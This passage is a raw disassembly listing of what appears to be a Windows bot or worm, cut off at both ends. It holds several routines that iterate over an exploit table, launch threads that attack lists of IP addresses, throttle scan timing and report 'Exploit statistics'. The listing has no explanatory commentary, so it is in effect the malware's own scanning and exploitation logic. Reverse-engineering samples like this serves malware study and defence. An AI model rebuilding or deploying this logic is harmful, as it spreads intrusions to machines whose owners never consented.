lea eax, [ebp+var_10A]
push eax
lea eax, [ebp+var_86]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_413444
; ---------------------------------------------------------------------------
loc_413420: ; CODE XREF: sub_41331E+C9�j
call sub_412D4C
push eax
lea eax, [ebp+var_6]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset dword_41EF18
lea eax, [ebp+var_86]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_413444: ; CODE XREF: sub_41331E+C0�j
; sub_41331E+100�j
lea eax, [ebp+var_14C]
push eax
call [ebp+var_11A]
cmp [ebp+var_8A], 1
jnz short loc_41346F
push [ebp+var_10E]
push [ebp+var_14C]
call sub_412A3A
pop ecx
pop ecx
jmp short loc_41348A
; ---------------------------------------------------------------------------
loc_41346F: ; CODE XREF: sub_41331E+13A�j
cmp [ebp+var_8A], 2
jnz short loc_41348A
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_86]
push eax
call sub_412BC9
pop ecx
pop ecx
loc_41348A: ; CODE XREF: sub_41331E+14F�j
; sub_41331E+158�j
push [ebp+var_10E]
call sub_4053B1
pop ecx
xor eax, eax
locret_413498: ; CODE XREF: sub_41331E+5E�j
; sub_41331E+8E�j
leave
retn 4
sub_41331E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41349C proc near ; DATA XREF: sub_413AB0+1F4�o
var_774 = qword ptr -774h
var_764 = qword ptr -764h
var_75C = byte ptr -75Ch
var_65C = byte ptr -65Ch
var_658 = dword ptr -658h
var_654 = dword ptr -654h
var_650 = dword ptr -650h
var_64C = byte ptr -64Ch
var_648 = byte ptr -648h
var_644 = dword ptr -644h
var_640 = byte ptr -640h
var_62C = dword ptr -62Ch
var_628 = dword ptr -628h
var_624 = byte ptr -624h
var_51C = byte ptr -51Ch
var_50E = dword ptr -50Eh
var_50A = dword ptr -50Ah
var_506 = dword ptr -506h
var_502 = byte ptr -502h
var_37B = byte ptr -37Bh
var_37A = byte ptr -37Ah
var_377 = byte ptr -377h
var_36B = byte ptr -36Bh
var_36A = byte ptr -36Ah
var_35C = dword ptr -35Ch
var_358 = dword ptr -358h
var_354 = byte ptr -354h
var_341 = byte ptr -341h
var_296 = dword ptr -296h
var_20C = byte ptr -20Ch
var_20B = byte ptr -20Bh
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_107 = byte ptr -107h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 764h
push edi
push 2C9h
push [ebp+arg_0]
lea eax, [ebp+var_628]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_51C]
push eax
call sub_407A86
pop ecx
movzx eax, al
test eax, eax
jz short loc_4134F5
push 14Ch
push 0
lea eax, [ebp+var_358]
push eax
call sub_416B6A ; memset
add esp, 0Ch
jmp loc_4135BF
; ---------------------------------------------------------------------------
loc_4134F5: ; CODE XREF: sub_41349C+3C�j
and [ebp+var_62C], 0
jmp short loc_41350B
; ---------------------------------------------------------------------------
loc_4134FE: ; CODE XREF: sub_41349C:loc_4135BA�j
mov eax, [ebp+var_62C]
inc eax
mov [ebp+var_62C], eax
loc_41350B: ; CODE XREF: sub_41349C+60�j
mov eax, [ebp+var_62C]
imul eax, 3Ah
add eax, offset byte_41CCA8
push eax
lea eax, [ebp+var_640]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_640]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_640]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_4135BA
mov eax, [ebp+var_62C]
imul eax, 3Ah
add eax, offset byte_41CCA8
mov [ebp+var_358], eax
push 3Ah
mov eax, [ebp+var_62C]
imul eax, 3Ah
add eax, offset byte_41CCA8
push eax
lea eax, [ebp+var_354]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_354]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_341]
push eax
call sub_4105FB
pop ecx
and [ebp+var_296], 0
lea eax, [ebp+var_341]
push eax
lea eax, [ebp+var_51C]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_4135BF
; ---------------------------------------------------------------------------
loc_4135BA: ; CODE XREF: sub_41349C+B0�j
jmp loc_4134FE
; ---------------------------------------------------------------------------
loc_4135BF: ; CODE XREF: sub_41349C+54�j
; sub_41349C+11C�j
lea eax, [ebp+var_624]
push eax
call sub_40806A
pop ecx
test eax, eax
jnz short loc_4135E3
push [ebp+var_628]
call sub_409763
pop ecx
xor eax, eax
jmp loc_413AAB
; ---------------------------------------------------------------------------
loc_4135E3: ; CODE XREF: sub_41349C+132�j
mov al, byte_41DE00
mov [ebp+var_20C], al
push 3Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_20B]
rep stosd
stosw
stosb
mov al, byte_41DE00
mov [ebp+var_108], al
push 3Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_107]
rep stosd
stosw
stosb
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_624]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_407F3D
add esp, 0Ch
test eax, eax
jnz short loc_41364D
push [ebp+var_628]
call sub_409763
pop ecx
xor eax, eax
jmp loc_413AAB
; ---------------------------------------------------------------------------
loc_41364D: ; CODE XREF: sub_41349C+19C�j
push [ebp+var_506]
call sub_404D10
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_413675
push [ebp+var_628]
call sub_409763
pop ecx
xor eax, eax
jmp loc_413AAB
; ---------------------------------------------------------------------------
loc_413675: ; CODE XREF: sub_41349C+1C4�j
cmp [ebp+var_358], 0
jz loc_413782
mov eax, [ebp+var_358]
mov eax, [eax+32h]
and eax, 1
test eax, eax
jz loc_413782
call sub_4042FB
mov [ebp+var_644], eax
cmp [ebp+var_644], 0
jz short loc_4136B6
mov [ebp+var_296], 2
jmp short loc_4136C0
; ---------------------------------------------------------------------------
loc_4136B6: ; CODE XREF: sub_41349C+20C�j
mov [ebp+var_296], 3
loc_4136C0: ; CODE XREF: sub_41349C+218�j
movsx eax, [ebp+var_36B]
test eax, eax
jz short loc_4136E5
mov eax, [ebp+var_358]
mov eax, [eax+32h]
and eax, 2
test eax, eax
jnz short loc_4136E5
mov [ebp+var_296], 1
loc_4136E5: ; CODE XREF: sub_41349C+22D�j
; sub_41349C+23D�j
movsx eax, [ebp+var_37B]
test eax, eax
jz short loc_4136FA
mov [ebp+var_296], 2
loc_4136FA: ; CODE XREF: sub_41349C+252�j
movsx eax, [ebp+var_37A]
test eax, eax
jz short loc_41370F
mov [ebp+var_296], 3
loc_41370F: ; CODE XREF: sub_41349C+267�j
cmp [ebp+var_296], 3
jnz short loc_41372B
cmp [ebp+var_644], 0
jz short loc_41372B
mov [ebp+var_296], 2
loc_41372B: ; CODE XREF: sub_41349C+27A�j
; sub_41349C+283�j
cmp [ebp+var_296], 3
jnz short loc_413782
mov al, [ebp+var_36A]
mov [ebp+var_64C], al
mov al, [ebp+var_377]
mov [ebp+var_648], al
mov [ebp+var_36A], 1
and [ebp+var_377], 0
push 0
lea eax, [ebp+var_502]
push eax
call sub_412F07
pop ecx
pop ecx
mov al, [ebp+var_64C]
mov [ebp+var_36A], al
mov al, [ebp+var_648]
mov [ebp+var_377], al
loc_413782: ; CODE XREF: sub_41349C+1E0�j
; sub_41349C+1F4�j ...
push offset dword_41E2A8
call sub_409C6C
pop ecx
push [ebp+var_50E]
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_624]
push eax
push offset dword_41CE50
mov eax, [ebp+var_628]
add eax, 14h
push eax
call sub_416B5E ; sprintf
add esp, 14h
push offset dword_41E2A8
call sub_409C7A
pop ecx
push [ebp+var_50E]
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_624]
push eax
mov eax, [ebp+var_628]
push dword ptr [eax]
push offset dword_41CE18
lea eax, [ebp+var_502]
push eax
call sub_40D53F
add esp, 18h
cmp [ebp+var_358], 0
jnz short loc_413807
push 3E8h
call dword_41709C ; Sleep
loc_413807: ; CODE XREF: sub_41349C+35E�j
and [ebp+var_10C], 0
call sub_416B64 ; clock
mov [ebp+var_35C], eax
and [ebp+var_4], 0
loc_41381D: ; CODE XREF: sub_41349C+3F9�j
; sub_41349C+44B�j ...
mov eax, [ebp+var_628]
cmp dword ptr [eax+4], 0
jnz short loc_413847
call sub_416B64 ; clock
add eax, [ebp+var_4]
sub eax, [ebp+var_35C]
mov ecx, [ebp+var_50E]
imul ecx, 3E8h
cmp eax, ecx
jb short loc_41384C
loc_413847: ; CODE XREF: sub_41349C+38B�j
jmp loc_413A43
; ---------------------------------------------------------------------------
loc_41384C: ; CODE XREF: sub_41349C+3A9�j
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_624]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_407F3D
add esp, 0Ch
push offset dword_41EF18
lea eax, [ebp+var_20C]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_413897
jmp short loc_41381D
; ---------------------------------------------------------------------------
loc_413897: ; CODE XREF: sub_41349C+3F7�j
push [ebp+var_8]
push 0
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_404FE7
add esp, 0Ch
push eax
call sub_404D4D
pop ecx
pop ecx
mov [ebp+var_650], eax
cmp [ebp+var_650], 0
jz short loc_4138EC
call sub_416B64 ; clock
add eax, [ebp+var_4]
sub eax, [ebp+var_35C]
mov ecx, [ebp+var_50E]
imul ecx, 3E8h
cmp eax, ecx
jnb short loc_4138EC
jmp loc_41381D
; ---------------------------------------------------------------------------
loc_4138EC: ; CODE XREF: sub_41349C+42B�j
; sub_41349C+449�j
push [ebp+var_50A]
call dword_41709C ; Sleep
push [ebp+var_8]
call sub_404E1C
pop ecx
test eax, eax
jz loc_413A35
loc_413909: ; CODE XREF: sub_41349C+4BA�j
; sub_41349C:loc_413A30�j
push [ebp+var_8]
call sub_404F24
pop ecx
mov [ebp+var_654], eax
cmp [ebp+var_654], 0
jnz short loc_413926
jmp loc_413A35
; ---------------------------------------------------------------------------
loc_413926: ; CODE XREF: sub_41349C+483�j
mov eax, [ebp+var_10C]
inc eax
mov [ebp+var_10C], eax
cmp [ebp+var_358], 0
jz short loc_4139B7
push 14Ch
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_658], eax
cmp [ebp+var_658], 0
jnz short loc_413958
jmp short loc_413909
; ---------------------------------------------------------------------------
loc_413958: ; CODE XREF: sub_41349C+4B8�j
push 14Ch
lea eax, [ebp+var_358]
push eax
push [ebp+var_658]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_658]
mov ecx, [ebp+var_654]
mov [eax+3Eh], ecx
push [ebp+var_658]
push offset sub_41331E
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_4139A5
push [ebp+var_658]
call sub_416B4C ; free
pop ecx
jmp short loc_4139B5
; ---------------------------------------------------------------------------
loc_4139A5: ; CODE XREF: sub_41349C+4F9�j
push [ebp+var_8]
push [ebp+var_654]
call sub_404D9B
pop ecx
pop ecx
loc_4139B5: ; CODE XREF: sub_41349C+507�j
jmp short loc_413A30
; ---------------------------------------------------------------------------
loc_4139B7: ; CODE XREF: sub_41349C+49E�j
mov eax, [ebp+var_628]
cmp dword ptr [eax+4], 0
jz short loc_4139C5
jmp short loc_413A35
; ---------------------------------------------------------------------------
loc_4139C5: ; CODE XREF: sub_41349C+525�j
lea eax, [ebp+var_75C]
push eax
push [ebp+var_654]
call sub_4044F7
pop ecx
pop ecx
mov al, [ebp+var_36A]
mov [ebp+var_65C], al
and [ebp+var_36A], 0
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_75C]
push eax
push offset dword_41CE04
lea eax, [ebp+var_502]
push eax
call sub_40D53F
add esp, 10h
mov al, [ebp+var_65C]
mov [ebp+var_36A], al
push 3E8h
call dword_41709C ; Sleep
mov eax, [ebp+var_4]
add eax, 3E8h
mov [ebp+var_4], eax
loc_413A30: ; CODE XREF: sub_41349C:loc_4139B5�j
jmp loc_413909
; ---------------------------------------------------------------------------
loc_413A35: ; CODE XREF: sub_41349C+467�j
; sub_41349C+485�j ...
push [ebp+var_8]
call sub_404F7D
pop ecx
jmp loc_41381D
; ---------------------------------------------------------------------------
loc_413A43: ; CODE XREF: sub_41349C:loc_413847�j
push [ebp+var_10C]
call sub_416B64 ; clock
sub eax, [ebp+var_35C]
mov dword ptr [ebp+var_764], eax
and dword ptr [ebp+var_764+4], 0
fild [ebp+var_764]
fdiv flt_417270
push ecx
push ecx
fstp [esp+774h+var_774]
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_624]
push eax
push offset unk_41CDC0
lea eax, [ebp+var_502]
push eax
call sub_40D53F
add esp, 1Ch
push [ebp+var_8]
call sub_404FD0
pop ecx
push [ebp+var_628]
call sub_409763
pop ecx
xor eax, eax
loc_413AAB: ; CODE XREF: sub_41349C+142�j
; sub_41349C+1AC�j ...
pop edi
leave
retn 4
sub_41349C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413AB0 proc near ; CODE XREF: sub_40A9CF+BCB�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 34h
cmp [ebp+arg_4], 0
jz short loc_413AC2
cmp [ebp+arg_8], 0
jnz short loc_413AC7
loc_413AC2: ; CODE XREF: sub_413AB0+A�j
jmp locret_413CB1
; ---------------------------------------------------------------------------
loc_413AC7: ; CODE XREF: sub_413AB0+10�j
push [ebp+arg_8]
call sub_407A86
pop ecx
movzx eax, al
test eax, eax
jz short loc_413AEB
push [ebp+arg_8]
call sub_40422A
pop ecx
test eax, eax
jnz short loc_413AE9
jmp locret_413CB1
; ---------------------------------------------------------------------------
loc_413AE9: ; CODE XREF: sub_413AB0+32�j
jmp short loc_413B45
; ---------------------------------------------------------------------------
loc_413AEB: ; CODE XREF: sub_413AB0+25�j
and [ebp+var_14], 0
jmp short loc_413AF8
; ---------------------------------------------------------------------------
loc_413AF1: ; CODE XREF: sub_413AB0:loc_413B43�j
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
loc_413AF8: ; CODE XREF: sub_413AB0+3F�j
mov eax, [ebp+var_14]
imul eax, 3Ah
movsx eax, byte_41CCA8[eax]
test eax, eax
jnz short loc_413B0E
jmp locret_413CB1
; ---------------------------------------------------------------------------
loc_413B0E: ; CODE XREF: sub_413AB0+57�j
mov eax, [ebp+var_14]
imul eax, 3Ah
add eax, offset byte_41CCA8
push eax
lea eax, [ebp+var_28]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_28]
push eax
call sub_4105FB
pop ecx
push [ebp+arg_8]
lea eax, [ebp+var_28]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_413B43
jmp short loc_413B45
; ---------------------------------------------------------------------------
loc_413B43: ; CODE XREF: sub_413AB0+8F�j
jmp short loc_413AF1
; ---------------------------------------------------------------------------
loc_413B45: ; CODE XREF: sub_413AB0:loc_413AE9�j
; sub_413AB0+91�j
cmp [ebp+arg_C], 0
jz short loc_413B59
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_2C], eax
jmp short loc_413B60
; ---------------------------------------------------------------------------
loc_413B59: ; CODE XREF: sub_413AB0+99�j
mov [ebp+var_2C], 15180h
loc_413B60: ; CODE XREF: sub_413AB0+A7�j
mov eax, [ebp+var_2C]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_413B75
cmp [ebp+var_4], 15180h
jbe short loc_413B7C
loc_413B75: ; CODE XREF: sub_413AB0+BA�j
mov [ebp+var_4], 15180h
loc_413B7C: ; CODE XREF: sub_413AB0+C3�j
cmp [ebp+arg_10], 0
jz short loc_413B90
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_30], eax
jmp short loc_413B97
; ---------------------------------------------------------------------------
loc_413B90: ; CODE XREF: sub_413AB0+D0�j
mov [ebp+var_30], 7D0h
loc_413B97: ; CODE XREF: sub_413AB0+DE�j
mov eax, [ebp+var_30]
mov [ebp+var_C], eax
cmp [ebp+var_C], 32h
jb short loc_413BAC
cmp [ebp+var_C], 0EA60h
jbe short loc_413BB3
loc_413BAC: ; CODE XREF: sub_413AB0+F1�j
mov [ebp+var_C], 7D0h
loc_413BB3: ; CODE XREF: sub_413AB0+FA�j
cmp [ebp+arg_14], 0
jz short loc_413BC7
push [ebp+arg_14]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_34], eax
jmp short loc_413BCE
; ---------------------------------------------------------------------------
loc_413BC7: ; CODE XREF: sub_413AB0+107�j
mov [ebp+var_34], 100h
loc_413BCE: ; CODE XREF: sub_413AB0+115�j
mov eax, [ebp+var_34]
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_413BE3
cmp [ebp+var_10], 200h
jbe short loc_413BEA
loc_413BE3: ; CODE XREF: sub_413AB0+128�j
mov [ebp+var_10], 100h
loc_413BEA: ; CODE XREF: sub_413AB0+131�j
push 2C9h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_413C03
jmp locret_413CB1
; ---------------------------------------------------------------------------
loc_413C03: ; CODE XREF: sub_413AB0+14C�j
push 108h
push [ebp+arg_4]
mov eax, [ebp+var_8]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push 0Eh
push [ebp+arg_8]
mov eax, [ebp+var_8]
add eax, 10Ch
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
mov [eax+11Ah], ecx
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
mov [eax+11Eh], ecx
mov eax, [ebp+var_8]
mov ecx, [ebp+var_10]
mov [eax+122h], ecx
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_8]
add eax, 126h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+var_10]
push [ebp+var_C]
mov eax, [ebp+var_8]
push dword ptr [eax+11Ah]
mov eax, [ebp+var_8]
add eax, 10Ch
push eax
mov eax, [ebp+var_8]
add eax, 4
push eax
push offset unk_41CE7C
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_8]
push offset sub_41349C
call sub_4095A4
add esp, 24h
locret_413CB1: ; CODE XREF: sub_413AB0:loc_413AC2�j
; sub_413AB0+34�j ...
leave
retn
sub_413AB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413CB3 proc near ; DATA XREF: sub_413FE7+5C�o
var_49C = dword ptr -49Ch
var_498 = byte ptr -498h
var_494 = byte ptr -494h
var_490 = dword ptr -490h
var_48C = dword ptr -48Ch
var_488 = dword ptr -488h
var_484 = dword ptr -484h
var_480 = dword ptr -480h
var_47C = byte ptr -47Ch
var_469 = byte ptr -469h
var_3BE = dword ptr -3BEh
var_334 = dword ptr -334h
var_330 = dword ptr -330h
var_32C = byte ptr -32Ch
var_1AC = byte ptr -1ACh
var_25 = byte ptr -25h
var_24 = byte ptr -24h
var_21 = byte ptr -21h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 49Ch
push 327h
push [ebp+arg_0]
lea eax, [ebp+var_330]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
mov eax, [ebp+var_330]
push dword ptr [eax]
push offset unk_41CF28
lea eax, [ebp+var_1AC]
push eax
call sub_40D53F
add esp, 0Ch
and [ebp+var_334], 0
and [ebp+var_484], 0
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
lea eax, [ebp+var_32C]
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_8], eax
loc_413D21: ; CODE XREF: sub_413CB3:loc_413FA8�j
mov eax, [ebp+var_334]
inc eax
mov [ebp+var_334], eax
and [ebp+var_488], 0
jmp short loc_413D44
; ---------------------------------------------------------------------------
loc_413D37: ; CODE XREF: sub_413CB3+23B�j
; sub_413CB3:loc_413F77�j
mov eax, [ebp+var_488]
inc eax
mov [ebp+var_488], eax
loc_413D44: ; CODE XREF: sub_413CB3+82�j
mov eax, [ebp+var_488]
imul eax, 3Ah
cmp off_41CCD6[eax], 0
jz loc_413F7C
push 3Ah
mov eax, [ebp+var_488]
imul eax, 3Ah
add eax, offset byte_41CCA8
push eax
lea eax, [ebp+var_47C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_488]
imul eax, 3Ah
add eax, offset byte_41CCA8
mov [ebp+var_480], eax
lea eax, [ebp+var_47C]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_469]
push eax
call sub_4105FB
pop ecx
cmp [ebp+var_480], 0
jz loc_413E9A
mov eax, [ebp+var_480]
mov eax, [eax+32h]
and eax, 1
test eax, eax
jz loc_413E9A
call sub_4042FB
mov [ebp+var_490], eax
cmp [ebp+var_490], 0
jz short loc_413DE9
mov [ebp+var_3BE], 2
jmp short loc_413DF3
; ---------------------------------------------------------------------------
loc_413DE9: ; CODE XREF: sub_413CB3+128�j
mov [ebp+var_3BE], 3
loc_413DF3: ; CODE XREF: sub_413CB3+134�j
movsx eax, [ebp+var_15]
test eax, eax
jz short loc_413E15
mov eax, [ebp+var_480]
mov eax, [eax+32h]
and eax, 2
test eax, eax
jnz short loc_413E15
mov [ebp+var_3BE], 1
loc_413E15: ; CODE XREF: sub_413CB3+146�j
; sub_413CB3+156�j
movsx eax, [ebp+var_25]
test eax, eax
jz short loc_413E27
mov [ebp+var_3BE], 2
loc_413E27: ; CODE XREF: sub_413CB3+168�j
movsx eax, [ebp+var_24]
test eax, eax
jz short loc_413E39
mov [ebp+var_3BE], 3
loc_413E39: ; CODE XREF: sub_413CB3+17A�j
cmp [ebp+var_3BE], 3
jnz short loc_413E55
cmp [ebp+var_490], 0
jz short loc_413E55
mov [ebp+var_3BE], 2
loc_413E55: ; CODE XREF: sub_413CB3+18D�j
; sub_413CB3+196�j
cmp [ebp+var_3BE], 3
jnz short loc_413E9A
mov al, [ebp+var_14]
mov [ebp+var_498], al
mov al, [ebp+var_21]
mov [ebp+var_494], al
mov [ebp+var_14], 1
and [ebp+var_21], 0
push 0
lea eax, [ebp+var_1AC]
push eax
call sub_412F07
pop ecx
pop ecx
mov al, [ebp+var_498]
mov [ebp+var_14], al
mov al, [ebp+var_494]
mov [ebp+var_21], al
loc_413E9A: ; CODE XREF: sub_413CB3+FC�j
; sub_413CB3+110�j ...
movsx eax, [ebp+var_13]
neg eax
sbb eax, eax
and eax, 1388h
add eax, 1388h
push eax
push 0
lea eax, [ebp+var_469]
push eax
push [ebp+var_8]
call sub_4050EA
add esp, 10h
mov [ebp+var_48C], eax
cmp [ebp+var_48C], 0
jz loc_413F77
push 14Ch
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_49C], eax
cmp [ebp+var_49C], 0
jnz short loc_413EF3
jmp loc_413D37
; ---------------------------------------------------------------------------
loc_413EF3: ; CODE XREF: sub_413CB3+239�j
push 14Ch
lea eax, [ebp+var_480]
push eax
push [ebp+var_49C]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_484]
inc eax
mov [ebp+var_484], eax
mov eax, [ebp+var_49C]
mov ecx, [ebp+var_48C]
mov [eax+3Eh], ecx
push [ebp+var_49C]
push offset sub_41331E
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_413F59
push [ebp+var_48C]
call sub_4053B1
pop ecx
push [ebp+var_49C]
call sub_416B4C ; free
pop ecx
jmp short loc_413F77
; ---------------------------------------------------------------------------
loc_413F59: ; CODE XREF: sub_413CB3+28A�j
lea eax, [ebp+var_47C]
push eax
push [ebp+var_8]
push offset dword_41CEF8
lea eax, [ebp+var_1AC]
push eax
call sub_40D53F
add esp, 10h
loc_413F77: ; CODE XREF: sub_413CB3+21B�j
; sub_413CB3+2A4�j
jmp loc_413D37
; ---------------------------------------------------------------------------
loc_413F7C: ; CODE XREF: sub_413CB3+A1�j
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_413F9A
jmp short loc_413FAD
; ---------------------------------------------------------------------------
loc_413F9A: ; CODE XREF: sub_413CB3+2E3�j
mov eax, [ebp+var_330]
cmp dword ptr [eax+4], 0
jz short loc_413FA8
jmp short loc_413FAD
; ---------------------------------------------------------------------------
loc_413FA8: ; CODE XREF: sub_413CB3+2F1�j
jmp loc_413D21
; ---------------------------------------------------------------------------
loc_413FAD: ; CODE XREF: sub_413CB3+2E5�j
; sub_413CB3+2F3�j
push [ebp+var_334]
push [ebp+var_484]
mov eax, [ebp+var_330]
push dword ptr [eax]
push offset dword_41CEB4
lea eax, [ebp+var_1AC]
push eax
call sub_40D53F
add esp, 14h
push [ebp+var_330]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_413CB3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413FE7 proc near ; CODE XREF: sub_40A9CF+B5B�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
jnz short loc_413FF3
jmp short locret_414050
; ---------------------------------------------------------------------------
loc_413FF3: ; CODE XREF: sub_413FE7+8�j
push 327h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414009
jmp short locret_414050
; ---------------------------------------------------------------------------
loc_414009: ; CODE XREF: sub_413FE7+1E�j
push 180h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 184h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push offset aAttemptingToEx ; "Attempting to exploit IP's in list."
push 0
push [ebp+var_4]
push offset sub_413CB3
call sub_4095A4
add esp, 10h
locret_414050: ; CODE XREF: sub_413FE7+A�j
; sub_413FE7+20�j
leave
retn
sub_413FE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414052 proc near ; DATA XREF: sub_41417D+35�o
var_3C0 = dword ptr -3C0h
var_3BC = byte ptr -3BCh
var_225 = byte ptr -225h
var_224 = byte ptr -224h
var_218 = byte ptr -218h
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3C0h
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_3C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push offset aExploitStatist ; "Exploit statistics - "
lea eax, [ebp+var_200]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
and [ebp+var_204], 0
jmp short loc_4140A4
; ---------------------------------------------------------------------------
loc_414097: ; CODE XREF: sub_414052:loc_41414A�j
mov eax, [ebp+var_204]
inc eax
mov [ebp+var_204], eax
loc_4140A4: ; CODE XREF: sub_414052+43�j
mov eax, [ebp+var_204]
imul eax, 3Ah
movsx eax, byte_41CCA8[eax]
test eax, eax
jz loc_41414F
push 12h
mov eax, [ebp+var_204]
imul eax, 3Ah
add eax, offset byte_41CCA8
push eax
lea eax, [ebp+var_218]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_218]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_218]
push eax
lea eax, [ebp+var_200]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
mov eax, [ebp+var_204]
imul eax, 3Ah
push dword_41CCD2[eax]
push offset dword_41CF7C
lea eax, [ebp+var_200]
push eax
call sub_416B40 ; strlen
pop ecx
lea eax, [ebp+eax+var_200]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
movsx eax, [ebp+var_225]
test eax, eax
jz short loc_41414A
mov eax, [ebp+var_204]
imul eax, 3Ah
and dword_41CCD2[eax], 0
loc_41414A: ; CODE XREF: sub_414052+E6�j
jmp loc_414097
; ---------------------------------------------------------------------------
loc_41414F: ; CODE XREF: sub_414052+64�j
and [ebp+var_224], 0
lea eax, [ebp+var_200]
push eax
lea eax, [ebp+var_3BC]
push eax
call sub_40D53F
pop ecx
pop ecx
push [ebp+var_3C0]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_414052 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41417D proc near ; CODE XREF: sub_40A9CF+BF4�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
